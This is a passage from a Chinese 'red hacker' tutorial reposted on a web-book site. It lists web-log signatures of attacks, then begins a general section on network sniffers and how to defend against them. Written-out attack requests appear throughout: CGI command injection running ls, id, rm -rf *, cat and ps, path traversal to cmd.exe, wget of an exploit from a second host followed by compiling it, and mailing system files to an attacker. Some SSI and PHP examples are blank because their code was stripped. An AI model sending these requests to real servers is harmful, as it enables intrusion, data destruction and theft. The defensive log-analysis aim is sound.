30天打造专业红客-第章

按键盘上方向键 ← 或 → 可快速上下翻页，按键盘上的 Enter 键可回到本书目录页，按键盘上方向键 ↑ 可回到本页顶部！
————未阅读完？加入书签已便下次继续阅读！


　　　　应该检查你的日志记录中这两个字符，众多的原因中，首要的一个是这个字符表明了添加数据在文件中　
　　　　Example　1：　
　　　　#　echo　'your　hax0red　h0　h0'　》》　/etc/motd　（请求写信息在motd这个文件中）　
　　　　一个攻击者可以容易的用象上面的这个请求篡改你的web页面。比如著名的RDS　exploit常被攻击者用于更改web主页面。　
　　　　Example　2：　
　　　　host/something。php=Hi％20mom％20Im％20Bold！　
　　　　你会注意到这里html语言的标志，同样用了“〈”，“〉”字符，这种攻击不能导致攻击者对系统进行访问，它迷惑人们认为这是个合法的信息在web站点中（导致人们在访问这个联结的时候访问到攻击者设定的地址，这种请求可能会被转变成16进制的编码字符形式，使攻击的痕迹不那么明显）
　　　　（7）'！'请求　
　　　　这种字符请求常用语对SS（Server　Side　Include）　I进行攻击，如果攻击者迷惑用户点击被攻击者设定的联结，和上面的一样。　
　　　　Example：　
　　　　host1/something。php=　
　　　　这个列子是攻击者可能会做的，它让一个host2站点上的文件看起来是来自于　host1上面的（当然，需要访问者访问这个被攻击者设定的联结。这种请求可能被转化成16进制的编码伪装，不易发现）　
　　　　同时，这种方式也可以以web站点的权限执行命令　
　　　　Example：　
　　　　host/something。php=　
　　　　这个列子在远程的系统上执行“id'的命令，它将显示这个web站点用户的id，通常是”nobody'或者“www'　
　　　　这种形式也允许包含隐藏文件。　
　　　　Example：　
　　　　host/something。php=　
　　　　这个隐藏文件。htpasswd不会被显示出来；Apache建立的规则会拒绝这种以。ht　形式的请求，而SSI标志会绕过这种限制，并导致安全问题　
　　　　（8）'　这种攻击用于试图在远程的web应用程序中插入PHP程序，它可能允许执行命令，这取决于服务器的设置，和其他起作用的一些因素（比如php设置为安全模式）　
　　　　Example：　host/something。php=　
　　　　在某些简单的php应用程序中，它可能会在远程系统上以web站点用户的权限执行本地命令　
　　　　（9）'‘'　请求　
　　　　这种字符后面常用在perl中执行命令，这个字符在web应用程序中不是经常的使用，所以，如果看到它在你的日志中，应该非常小心　
　　　　Example：　
　　　　host/something。cgi=‘id‘　
　　　　一个perl写的有问题的cgi程序，会导致执行id命令　
　　　　下面是针对管理员说的；因为现在很多网管都在看这个；所以我觉得有必要写一点；当然也是让你知道你的对手有哪些着数了；呵呵。我只是罗列了一些攻击后的痕迹；当然不能罗列所有了
　　　　'/bin/ls'　
　　　　这个命令请求整个路径，在很多的web应用程序中都有这个漏洞，如果你在日志中很多地方都看到这种请求，很大的可能性是存在远程执行命令漏洞，但并不一定是个问题，也可能是个错误的警报。再一次提醒，写好的web应用程序（cgi；asp；php。。。etc）是安全的基础　
　　　　Example：　
　　　　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/ls％20…al｜　
　　　　host/cgi…bin/bad。cgi？doh=ls％20…al；　
　　　　'cmd。exe'　
　　　　这是一个windows的shell；一个攻击者如果访问并运行这个脚本，在服务器设置允许的条件下可以在windows机器上做任何事情，很多的蠕虫病毒就是通过80端口，传播到远程的机器上　
　　　　host/scripts/something。asp=。。/。。/WINNT/system32/cmd。exe？dir＋e：　
　　　　'/bin/id'　
　　　　这是个2进制的文件，它的问题和/bin/ls一样，如果你在日志中很多地方都看到这种请求，很大的可能性是存在远程执行命令漏洞，但并不一定是个问题，也可能是个错误的警报。　
　　　　它将显示属于哪个用户和属于哪个组　
　　　　Example：　
　　　　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/id｜　
　　　　host/cgi…bin/bad。cgi？doh=id；　
　　　　'/bin/rm'　
　　　　这个命令可以删除文件，如果不正确的使用是非常危险的　
　　　　Examples：　
　　　　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/rm％20…rf％20*｜　
　　　　host/cgi…bin/bad。cgi？doh=rm％20…rf％20*；　
　　　　'wget　and　tftp'　命令　
　　　　这些命令常被攻击者用来下载可能进一步获得特权的文件，wget是unix下的命令，可能被用来下载后门程序，tftp是unix和nt下的命令，用来下载文件。一些IIS蠕虫通过tftp来复制自身传播病毒到其他的主机　
　　　　Examples：　
　　　　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/path/to…wget/wget％20host2/Phantasmp。c｜　host/cgi…bin/bad。cgi？doh=wget％20hwa…security/Phantasmp。c；　
　　　　'cat'　命令　
　　　　这个命令用来查看文件内容，常用来读重要的信息，比如配置文件，密码文件，信用卡文件和你能够想到的文件　
　　　　Examples：　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/cat％20/etc/motd｜　host/cgi…bin/bad。cgi？doh=cat％20/etc/motd；　
　　　　'echo'　命令　
　　　　这个命令常用于写数据到文件中，比如“index。html”　
　　　　Examples：　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/echo％20'fc…#kiwis％20was％20here'％20》》％200day。txt｜　host/cgi…bin/bad。cgi？doh=echo％20'fc…#kiwis％20was％20here'％20》》％200day。txt；　
　　　　'ps'　命令　
　　　　列出当前运行的进程，告诉攻击者远程主机运行了那些软件，以便从中得到一些安全问题的主意，获得进一步的权限　
　　　　Examples：　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/ps％20…aux｜　host/cgi…bin/bad。cgi？doh=ps％20…aux；　
　　　　'kill　and　killall'　命令　
　　　　在unix系统这个命令用于杀掉进程，一个攻击者可以用这个命令来停止系统服务和程序，同时可以擦掉攻击者的痕迹，一些exploit会产生很多的子进程　
　　　　Examples：　host/cgi…bin/bad。cgi？doh=。。/bin/kill％20…9％200｜　host/cgi…bin/bad。cgi？doh=kill％20…9％200；　
　　　　'uname'　命令　
　　　　这个命令告诉攻击者远程机器的名字，一些时候，通过这个命令知道web站点位于哪个isp，也许是攻击者曾今访问过的。通常uname　…a来请求，这些都将记录在日志文件中　
　　　　Examples：　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/uname％20…a｜　host/cgi…bin/bad。cgi？doh=uname％20…a；　
　　　　'cc；　gcc；　perl；　python；　etc。。。'　编译/解释命令　
　　　　攻击者通过wget或者tftp下载exploit，并用cc；gcc这样的编译程序进行编译成可执行程序，进一步获得特权　
　　　　Examples：　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/cc％20Phantasmp。c｜　host/cgi…bin/bad。cgi？doh=gcc％20Phantasmp。c；。/a。out％20…p％2031337；　
　　　　如果你查看日志中发现有“perl”　python”这些说明可能攻击者下载远程的perl　；python脚本程序，并试图本地获得特权　
　　　　'mail'　命令　
　　　　攻击者通常用这个命令将系统的一些重要文件发到攻击者自己的信箱，也肯能是进行邮件炸弹的攻击　
　　　　Examples：　host/cgi…bin/bad。cgi？doh=。。/。。/。。/。。/bin/mail％20attacker@****cnhonker％20《　
　　　　『第14天』sniffer，今天开始说它了
　　　　sniffers（嗅探器）几乎和internet有一样久的历史了。他们是最早的一个允许系统管理员分析网络和查明哪里有错误发生的工具。但是这个工具也给我们带来很大的方便。今天我们看2个问题：1。什么是sniffer　2。如何防止sniffer的监听。似乎是矛盾的哦，呵呵，要2个方面都知道才能百战百胜嘛
　　　　什嘛是sniffer　（抄定义的）
　　　　在单选性网络中；　以太网结构广播至网路上所有的机器；　但是只有预定接受信息包的那台计算机才会响应。　不过网路上其他的计算机同样会〃看到〃这个信息包；但是如果他们不是预定的接受者；他们会排除这个信息包。　当一台计算机上运行着sniffer的时候并且网络处于监听所有信息交通的状态；　那么这台计算机就有能力浏览所有的在网络上通过的信息包。（这个当然很爽了）
　　　　那你就有个问题谁使用这个呢？lan/wan　管理员使用sniffers来分析网络信息交通并且找出网络上何处发生问题。一个安全管理员可以同时用多种sniffers；　将它们放置在网络的各处；形成一个入侵警报系统。对于系统管理员来说sniffers是一个非常好的工具，当然还有我们大家了。那常见的sniffers　有哪些呢？很多，我常用的有Sniffer　Pro。当然看一些文章介绍了snoop，但注意这是在UNIX下的，我没怎么用　过　，所以就不说这个了。至于其他一些好用的，我想你学到现在了应该可以自己找了（上GOOGLE　或是BAIDU都可以，不然去yahoo也不错的）。
　　　　那怎么防止sniffer的监听？
　　　　显而易见的；保护网络不受sniffer监听的方法就是不要让它们进入。　如果一个人不能通过你的系统进入的话；那么他们无法安装sniffers。当有人看上一个大多数网络通讯流通的中心区域（防火墙或是代理服务器）时；他们便确定这是他们的攻击目标并将被监视。一些可能的〃受害者〃在服务器的旁边；这时候个人信息将被截获（可能是各种信息甚至是密码）
　　　　一个好的方式来保护你的网络不受sniffer监视是将网络用以太网接线器代替普通的集线器分成尽可能多的段。接线器可以分割你的网络通讯并防止每一个系统〃看到〃每个信息包。坏处是这种东西太贵了，这个还是很重要的
　　　　另一个方法是；和那种接线器比就是加密术。Sniffer依然可以监视到信息的传送；但是显示的是乱码。但这